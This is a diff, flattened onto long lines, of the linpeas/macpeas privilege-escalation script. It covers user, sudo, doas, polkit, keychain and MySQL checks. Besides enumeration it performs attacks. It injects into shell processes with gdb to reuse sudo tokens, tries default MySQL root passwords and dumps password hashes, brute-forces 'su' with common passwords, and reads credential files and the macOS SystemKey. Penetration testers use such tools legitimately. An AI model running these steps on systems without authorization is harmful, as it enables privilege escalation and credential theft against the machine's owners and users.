#-- UI) Clipboard and highlighted text - print_2title "Clipboard or highlighted text?" - if [ "$(command -v xclip 2>/dev/null)" ]; then - echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ "$(command -v xsel 2>/dev/null)" ]; then - echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ "$(command -v pbpaste 2>/dev/null)" ]; then - echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - else echo_not_found "xsel and xclip" - fi + print_2title "Ethernet Info" + warn_exec system_profiler SPEthernetDataType echo "" - #-- UI) Sudo -l - print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - (echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" - if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" + print_2title "USB Info" + warn_exec system_profiler SPUSBDataType + echo "" +fi +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q users_information; +print_title "Users Information" +########################################### +#----------) Users Information (----------# +########################################### +print_title "Users Information" + +#-- UI) My user +print_2title "My user" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" +echo "" + +if [ "$MACPEAS" ];then + print_2title "Current user Login and Logout hooks" + defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + echo "" + + print_2title "All Login and Logout hooks" + defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist + echo "" + + print_2title "Keychains" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" + security list-keychains + echo "" + + print_2title "SystemKey" + ls -l /var/db/SystemKey + if [ -r "/var/db/SystemKey" ]; then + echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - ( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" - if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then - echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," + echo "" +fi + +#-- UI) PGP keys? +print_2title "Do I have PGP keys?" +command -v gpg 2>/dev/null || echo_not_found "gpg" +gpg --list-keys 2>/dev/null +command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" +netpgpkeys --list-keys 2>/dev/null +command -v netpgp 2>/dev/null || echo_not_found "netpgp" +echo "" + +#-- UI) Clipboard and highlighted text +print_2title "Clipboard or highlighted text?" +if [ "$(command -v xclip 2>/dev/null)" ]; then + echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +elif [ "$(command -v xsel 2>/dev/null)" ]; then + echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +elif [ "$(command -v pbpaste 2>/dev/null)" ]; then + echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +else echo_not_found "xsel and xclip" +fi +echo "" + +#-- UI) Sudo -l +print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +(echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" +if [ "$PASSWORD" ]; then + (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" +fi +( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" +if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then + echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," +fi +for filename in '/etc/sudoers.d/*'; do + if [ -r "$filename" ]; then + echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" + grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," fi - for filename in '/etc/sudoers.d/*'; do - if [ -r "$filename" ]; then - echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" - grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," +done +echo "" + +#-- UI) Sudo tokens +print_2title "Checking sudo tokens" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; +fi +is_gdb="$(command -v gdb 2>/dev/null)" +if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; +else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; +fi +if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then + echo "Checking for sudo tokens in other shells owned by current user" + for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do + echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) + echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 + if [ -f "/tmp/shrndom32r2r" ]; then + echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + break fi done - echo "" + if [ -f "/tmp/shrndom32r2r" ]; then + rm -f /tmp/shrndom32r2r 2>/dev/null + else echo "The escalation didn't work... (try again later?)" + fi +fi +echo "" - #-- UI) Sudo tokens - print_2title "Checking sudo tokens" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; - else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; - fi - is_gdb="$(command -v gdb 2>/dev/null)" - if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; - else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; - fi - if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then - echo "Checking for sudo tokens in other shells owned by current user" - for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do - echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) - echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 - if [ -f "/tmp/shrndom32r2r" ]; then - echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - break - fi - done - if [ -f "/tmp/shrndom32r2r" ]; then - rm -f /tmp/shrndom32r2r 2>/dev/null - else echo "The escalation didn't work... (try again later?)" +#-- UI) Doas +print_2title "Checking doas.conf" +doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) +if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then + cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," +else echo_not_found "doas.conf" +fi +echo "" + +#-- UI) Pkexec policy +print_2title "Checking Pkexec policy" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" +(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" +echo "" + +#-- UI) Superusers +print_2title "Superusers" +awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Users with console +print_2title "Users with console" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" fi - fi - echo "" - - #-- UI) Doas - print_2title "Checking doas.conf" - doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) - if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then - cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," - else echo_not_found "doas.conf" - fi - echo "" - - #-- UI) Pkexec policy - print_2title "Checking Pkexec policy" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" - (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" - echo "" - - #-- UI) Superusers - print_2title "Superusers" - awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Users with console - print_2title "Users with console" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - fi - done - else - no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) - unexpected_shells="" - printf "%s\n" "$no_shells" | while read f; do - if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then - unexpected_shells="$f\n$unexpected_shells" - fi - done - grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - if [ "$unexpected_shells" ]; then - printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" - echo "Unexpected users with shells:" - printf "%s\n" "$unexpected_shells" | while read f; do - if [ "$f" ]; then - grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" - fi - done + done +else + no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) + unexpected_shells="" + printf "%s\n" "$no_shells" | while read f; do + if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then + unexpected_shells="$f\n$unexpected_shells" fi - fi - echo "" - - #-- UI) All users & groups - print_2title "All users & groups" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - else - cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - fi - echo "" - - #-- UI) Login now - print_2title "Login now" - (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Last logons - print_2title "Last logons" - (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Login info - print_2title "Last time logon each user" - lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - - EXISTS_FINGER="$(command -v finger 2>/dev/null)" - if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" + done + grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + if [ "$unexpected_shells" ]; then + printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" + echo "Unexpected users with shells:" + printf "%s\n" "$unexpected_shells" | while read f; do + if [ "$f" ]; then + grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" fi done fi - echo "" +fi +echo "" - #-- UI) Password policy - print_2title "Password policy" - grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" - echo "" +#-- UI) All users & groups +print_2title "All users & groups" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +else + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +fi +echo "" - if [ "$MACPEAS" ]; then - print_2title "Relevant last user info and user configs" - defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null - echo "" +#-- UI) Login now +print_2title "Login now" +(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" - print_2title "Guest user status" - sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - echo "" - fi +#-- UI) Last logons +print_2title "Last logons" +(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" - #-- UI) Brute su - EXISTS_SUDO="$(command -v sudo 2>/dev/null)" - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then - print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC - POSSIBE_SU_BRUTE=$(check_if_su_brute); - if [ "$POSSIBE_SU_BRUTE" ]; then - SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) - printf "%s\n" "$SHELLUSERS" | while read u; do - echo " Bruteforcing user $u..." - su_brute_user_num "$u" $PASSTRY - done - else - printf $GREEN"It's not possible to brute-force su.\n\n"$NC +#-- UI) Login info +print_2title "Last time logon each user" +lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + +EXISTS_FINGER="$(command -v finger 2>/dev/null)" +if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" fi - else - print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC - fi - print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC + done +fi +echo "" + +#-- UI) Password policy +print_2title "Password policy" +grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Relevant last user info and user configs" + defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null echo "" + + print_2title "Guest user status" + sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi - -if echo $CHECKS | grep -q SofI; then - ########################################### - #--------) Software Information (---------# - ########################################### - print_title "Software Information" - - #-- SI) Mysql version - print_2title "MySQL version" - mysql --version 2>/dev/null || echo_not_found "mysql" - echo "" - - #-- SI) Mysql connection root/root - print_list "MySQL connection using default root/root ........... " - mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) - if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no +#-- UI) Brute su +EXISTS_SUDO="$(command -v sudo 2>/dev/null)" +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then + print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC + POSSIBE_SU_BRUTE=$(check_if_su_brute); + if [ "$POSSIBE_SU_BRUTE" ]; then + SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) + printf "%s\n" "$SHELLUSERS" | while read u; do + echo " Bruteforcing user $u..." + su_brute_user_num "$u" $PASSTRY + done + else + printf $GREEN"It's not possible to brute-force su.\n\n"$NC fi +else + print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC +fi +print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi - #-- SI) Mysql connection root/toor - print_list "MySQL connection using root/toor ................... " - mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) - if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi +if echo $CHECKS | grep -q software_information; +print_title "Software Information" +########################################### +#--------) Software Information (---------# +########################################### - #-- SI) Mysql connection root/NOPASS - mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) - print_list "MySQL connection using root/NOPASS ................. " - if [ "$mysqlconnectnopass" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi +#-- SI) Mysql version +print_2title "MySQL version" +mysql --version 2>/dev/null || echo_not_found "mysql" +echo "" - #-- SI) Mysql credentials - print_2title "Searching mysql credentials and exec" - if [ "$PSTORAGE_MYSQL" ]; then - printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do - for f in $(find $d -name debian.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," - cat "$f" - fi - done - for f in $(find $d -name user.MYD 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," - grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" - fi - done - for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do - if [ -r "$f" ]; then - u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) - echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - fi - done - for f in $(find $d -name my.cnf 2>/dev/null); 